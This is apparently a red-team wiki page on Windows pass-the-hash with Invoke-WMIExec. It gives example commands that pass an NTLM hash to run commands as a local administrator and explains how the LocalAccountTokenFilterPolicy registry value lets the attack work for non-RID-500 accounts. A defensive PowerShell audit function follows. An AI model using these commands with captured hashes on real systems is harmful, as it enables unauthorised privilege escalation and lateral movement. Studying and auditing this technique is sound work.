# Pass The Hash: Privilege Escalation with Invoke-WMIExec

## Execution

If you have the NTLMv2 hash of a local administrator on a host `ws01`, it is possible to pass that hash and execute code with the privileges of that local administrator account:

```powershell
Invoke-WmiExec -target ws01 -hash 32ed87bd5fdc5e9cba88547376818d4 -username administrator -command hostname
```

Below, the user `low`, who is not a local admin, passes the hash of the local `administrator` account on `ws01` and executes a command successfully:

![](/files/-LoLI7anu4TZnyfBS8wf)

## RID != 500 - No Pass The Hash for You

Say you have a hash of the user `spotless`, who you know is a local admin on `ws01`:

![](/files/-LoLKMGqv9l9KRD9VPZ-)

...but when you attempt to pass the hash, you get access denied. Why is that?

![](/files/-LoLKGom5n8YrBvqXleI)

It is likely because of remote UAC token filtering: when a local account that is not RID 500 (i.e. not the built-in administrator account) authenticates over the network, Windows strips the administrative privileges and group memberships from the token it creates, so the logon succeeds but the resulting token has no admin rights.

![](/files/-LoLIxysmm-wrRcD6DHb)

![](/files/-LoLIqJWY2Kvz6AWgmup)

If the target system you are passing the hash to has the following registry value (a DWORD; it is absent by default, which keeps the filtering on) set to 0x1, token filtering is disabled and pass the hash will work even for local accounts that are not RID 500:

```
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy
```

![](/files/-LoLGamBIQD-6JVQflAu)

```powershell
Invoke-WmiExec -target ws01 -hash 32ed87bd5fdc5e9cba88547376818d4 -username spotless -command hostname
```

![](/files/-LoLIN-9CpyZOEomvzuF)
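As an added audit example (not part of the original page or of Invoke-WMIExec), the following PowerShell function reports the host's `LocalAccountTokenFilterPolicy` setting and lists local members of Administrators by RID, so a defender can see which accounts would receive a full token over the network. It assumes the built-in `LocalAccounts` module (Windows 10 / Server 2016 and later); `Get-RemoteTokenFilterStatus` is a name chosen here.

```powershell
# Added audit example (not from the original page or Invoke-WMIExec).
# Reports whether remote UAC token filtering is disabled on this host and
# which local administrators are not the built-in RID-500 account.
# Assumes the LocalAccounts module (Windows 10 / Server 2016 and later).
function Get-RemoteTokenFilterStatus {
    [CmdletBinding()]
    param()

    $key  = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $name = 'LocalAccountTokenFilterPolicy'

    # An absent value behaves like 0: network logons by non-RID-500 local
    # admins receive a filtered token. 1 disables the filter (the scenario
    # described on this page).
    $policy = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name
    $filterDisabled = ($policy -eq 1)

    # Local (non-domain) user members of Administrators, with the RID taken
    # from the last component of the account SID.
    $localAdmins = Get-LocalGroupMember -Group 'Administrators' |
        Where-Object { $_.ObjectClass -eq 'User' -and $_.PrincipalSource -eq 'Local' } |
        ForEach-Object {
            $rid = [int](($_.SID.Value -split '-')[-1])
            [pscustomobject]@{
                Name            = $_.Name
                RID             = $rid
                BuiltInAdmin    = ($rid -eq 500)
                # A full token over the network is only granted to RID 500,
                # or to everyone when the filter has been disabled.
                RemoteFullToken = ($rid -eq 500 -or $filterDisabled)
            }
        }

    [pscustomobject]@{
        LocalAccountTokenFilterPolicy = $policy
        RemoteTokenFilterDisabled     = $filterDisabled
        LocalAdministrators           = $localAdmins
    }
}

$status = Get-RemoteTokenFilterStatus
$status.LocalAdministrators | Format-Table -AutoSize
if ($status.RemoteTokenFilterDisabled) {
    Write-Warning 'LocalAccountTokenFilterPolicy=1: every local admin listed gets a full token remotely. Remove the value (or set it to 0) to restore filtering.'
}
```

Run it in an elevated session on the host being audited; any account with `RemoteFullToken` set to `True` is one whose hash, if captured, grants full administrative rights over the network.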

## References

{% embed url="https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/" %}
